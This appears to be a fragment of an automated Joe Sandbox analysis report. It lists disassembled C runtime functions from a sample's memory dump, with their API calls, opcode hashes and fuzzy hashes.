                                                                                                                                                                                            • API String ID: 2040435927-0
                                                                                                                                                                                            • Opcode ID: ea2cb529eb280c923d0da809708810fc10c727f010c96cce18d018f824054b6b
                                                                                                                                                                                            • Instruction ID: d7047ee128fc266b84a9e600cdac1751865ffd2f120892c72041067a1f31a0fd
                                                                                                                                                                                            • Opcode Fuzzy Hash: ea2cb529eb280c923d0da809708810fc10c727f010c96cce18d018f824054b6b
                                                                                                                                                                                            • Instruction Fuzzy Hash: FB51DE72610626AFEF209F60EC45FBA7BA9EF40740F568429F904E61A8DB34CD108B90
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00926217
                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0092621F
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 009262A8
                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 009262D3
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00926328
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                            • Opcode ID: 51bcf3f14f019040b073ce2b0483e90a0be16c1320a560582de7baa0632c6f6f
                                                                                                                                                                                            • Instruction ID: a6193c6514cd2bcd977df02a5eb579202aaf075d288f7a465a8427e400f57dae
                                                                                                                                                                                            • Opcode Fuzzy Hash: 51bcf3f14f019040b073ce2b0483e90a0be16c1320a560582de7baa0632c6f6f
                                                                                                                                                                                            • Instruction Fuzzy Hash: DE41D534A00228DFCF11DF68E880B9E7BB5EF85328F148555E8249B79AC731EE01CB91
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,0092F578,0092186A,?,00000000,009231E1,0092186C,?,0092F1F6,00000022,FlsSetValue,0093DFE0,0093DFE8,009231E1), ref: 0092F52A
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                            • API String ID: 3664257935-537541572
                                                                                                                                                                                            • Opcode ID: 6d826bd3b3e10fd07202885d0c946d95782264c28e941a36635367c87c88a28c
                                                                                                                                                                                            • Instruction ID: c890f8567bcfbb475098310bb0254c27f5e3cd43160c566cafbae061088b29db
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d826bd3b3e10fd07202885d0c946d95782264c28e941a36635367c87c88a28c
                                                                                                                                                                                            • Instruction Fuzzy Hash: A421F376A12221ABCB219F25FC54E6B777C9F42764B204234FD06A72A4E770EE00DAD0
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 182a54aec07066987311e00e489426a503c88b1e838475e826d307ac650380b6
                                                                                                                                                                                            • Instruction ID: 789609da0d41b6b10d2b5273ed1d31fa225b9997b241759087fe024e672cd881
                                                                                                                                                                                            • Opcode Fuzzy Hash: 182a54aec07066987311e00e489426a503c88b1e838475e826d307ac650380b6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 74B133B5E04354BFDB11DFA8E880BAE7BB5AF86310F1481A9F9019B296C7709941CF61
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0092D2B7,00925FB7,00925179), ref: 0092D2CE
                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0092D2DC
                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0092D2F5
                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,0092D2B7,00925FB7,00925179), ref: 0092D347
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                            • Opcode ID: ed022a8115f9a7322f8ca3b25cd5e08c568399ec8000fab8eeede86406239ec6
                                                                                                                                                                                            • Instruction ID: 9c397db88ebc1f1279e211d1e012a3c124d300f528b93e2b42c480449ef53576
                                                                                                                                                                                            • Opcode Fuzzy Hash: ed022a8115f9a7322f8ca3b25cd5e08c568399ec8000fab8eeede86406239ec6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4201F73621F732AFA6356BF5BCC5E6B6688EF427B97600329F120650F5EF114C04A6C1
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 0092DCA7
                                                                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 0092DF20
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                            • API String ID: 2673424686-393685449
                                                                                                                                                                                            • Opcode ID: a3e077243eaa76f1e16b92495bcb27a7eda49e487b66eaac9e598f572651e32c
                                                                                                                                                                                            • Instruction ID: aaf41f59c49b8a2e5648ef18f24f81b9735d9469634850e3ec443c5197ff46a7
                                                                                                                                                                                            • Opcode Fuzzy Hash: a3e077243eaa76f1e16b92495bcb27a7eda49e487b66eaac9e598f572651e32c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7DB1BF71802229EFCF24EFA4E881AAEB7B9FF55310F154059F8116B25AD370EA51CF91
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,1206BC9F,?,?,00000000,0093B774,000000FF,?,00928D16,00928BFD,?,00928DB2,00000000), ref: 00928C8A
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00928C9C
                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,0093B774,000000FF,?,00928D16,00928BFD,?,00928DB2,00000000), ref: 00928CBE
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                            • Opcode ID: 8c0c750092f2bbdb9e216043416a8f6f700ceff420f6544d4f2118d06b770439
                                                                                                                                                                                            • Instruction ID: 2089c62bbb99d9690dcefc6a2ff8c941ef3455c51cd4bbdae27d4dbb915f4acf
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c0c750092f2bbdb9e216043416a8f6f700ceff420f6544d4f2118d06b770439
                                                                                                                                                                                            • Instruction Fuzzy Hash: BF01DB35915625EFCB11CF60DC09FAEB7BCFB45B14F008525F812A22D0DB749900CA90
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0092FCC2
                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0092FD8B
                                                                                                                                                                                            • __freea.LIBCMT ref: 0092FDF2
                                                                                                                                                                                              • Part of subcall function 0092E531: RtlAllocateHeap.NTDLL(00000000,009231E1,0092186A,?,009260C1,0092186C,0092186A,?,?,?,00923181,009231E1,0092186E,0092186A,0092186A,0092186A), ref: 0092E563
                                                                                                                                                                                            • __freea.LIBCMT ref: 0092FE05
                                                                                                                                                                                            • __freea.LIBCMT ref: 0092FE12
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1423051803-0
                                                                                                                                                                                            • Opcode ID: 2b1ad435d16d684fa6ea35c4b2bf8dabccd02980f325b39d4c0c7ccdb0c22bb0
                                                                                                                                                                                            • Instruction ID: 443de7f763eac212baa14a78e639a3aea029d2c0a0da6cc9e69bce0999ceb3e8
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b1ad435d16d684fa6ea35c4b2bf8dabccd02980f325b39d4c0c7ccdb0c22bb0
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3651B672501226ABEF219F61EC91EBB76BDEF84710B16053DFD04E6169EB34CC5086A0
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00923017
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00923022
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00923090
                                                                                                                                                                                              • Part of subcall function 00922EE4: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00922EFC
                                                                                                                                                                                            • std::locale::_Setgloballocale.LIBCPMT ref: 0092303D
                                                                                                                                                                                            • _Yarn.LIBCPMT ref: 00923053
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1088826258-0
                                                                                                                                                                                            • Opcode ID: 1b5d1bb02c481d616cbf3a8f7bd76ff227b8ffd1e1d3881294704ecccd3dcd32
                                                                                                                                                                                            • Instruction ID: a0df219aeeb993f6458ef157a567a0aa0d1464b110ed5773d929e3ff4d0995a2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b5d1bb02c481d616cbf3a8f7bd76ff227b8ffd1e1d3881294704ecccd3dcd32
                                                                                                                                                                                            • Instruction Fuzzy Hash: D4017CB9A056309BCB09EF60E855A7C7761FFC6350B158109E91257389CF386E02EB91
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00937F2E,00000000,?,00946E10,?,?,?,00937E65,00000004,InitializeCriticalSectionEx,0093E57C,0093E584), ref: 00937E9F
                                                                                                                                                                                            • GetLastError.KERNEL32(?,00937F2E,00000000,?,00946E10,?,?,?,00937E65,00000004,InitializeCriticalSectionEx,0093E57C,0093E584,00000000,?,0092E1DC), ref: 00937EA9
                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00937ED1
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                                                                                                            • Opcode ID: c6433c8fa71d438011a51bee66566098e3c405cb08c1daa6b5d8d41b89df0203
                                                                                                                                                                                            • Instruction ID: 1e3c9e5dfac5b6506ae3f89e3a3ddff7f2cd8349cb83b460f220048cf35d74f2
                                                                                                                                                                                            • Opcode Fuzzy Hash: c6433c8fa71d438011a51bee66566098e3c405cb08c1daa6b5d8d41b89df0203
                                                                                                                                                                                            • Instruction Fuzzy Hash: BCE04F74298209BBEF301BB1EC06F597B5DDB51B94F208060F94DB88F1E7A19E50AEC5
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetConsoleOutputCP.KERNEL32(1206BC9F,00000000,00000000,?), ref: 00935690
                                                                                                                                                                                              • Part of subcall function 0092E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0092FDE8,?,00000000,-00000008), ref: 0092E6A2
                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 009358E2
                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00935928
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 009359CB
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2112829910-0
                                                                                                                                                                                            • Opcode ID: 8539104f75706ed18fdb5edf52d7291cecfbef5c27b6ba9a74703db3e2dcf55f
                                                                                                                                                                                            • Instruction ID: 4a4a88ffc334c9ef4e6600d78b6a0e7d83c529534d040ab05cf33d51aaf87d23
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8539104f75706ed18fdb5edf52d7291cecfbef5c27b6ba9a74703db3e2dcf55f
                                                                                                                                                                                            • Instruction Fuzzy Hash: C5D198B5D04648DFCB05CFA8D880AAEBBF9FF4D310F29452AE856EB251D630A941CF50
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1740715915-0
                                                                                                                                                                                            • Opcode ID: 21143368538983fc5cca214c0812f9f6d7891e5bf58359e3cd6b42b2d9f8b2da
                                                                                                                                                                                            • Instruction ID: d308938f53a6fb2d7f01704f3b3e42e653adc18a6531c64a95f7eb95a46a726f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 21143368538983fc5cca214c0812f9f6d7891e5bf58359e3cd6b42b2d9f8b2da
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5551257A607626AFDB289F10F841BBAB3B8EF44310F24442DF94157299E731ED80CB90
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0092E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0092FDE8,?,00000000,-00000008), ref: 0092E6A2
                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0093359B
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 009335A2
                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 009335DC
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 009335E3
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1913693674-0
                                                                                                                                                                                            • Opcode ID: c0727cb182d458267718fda70e8e4459c22bacd8f7e9081fd1a0adab184d40d6
                                                                                                                                                                                            • Instruction ID: b7bb01b1f92222e20fc535298aae9a995ae88b02a62cc322822219dcd368e3d2
                                                                                                                                                                                            • Opcode Fuzzy Hash: c0727cb182d458267718fda70e8e4459c22bacd8f7e9081fd1a0adab184d40d6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8421A471640715EFDB20AF66A88196BBBACFF40364B10C519F82997651EB30EF508FA1
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
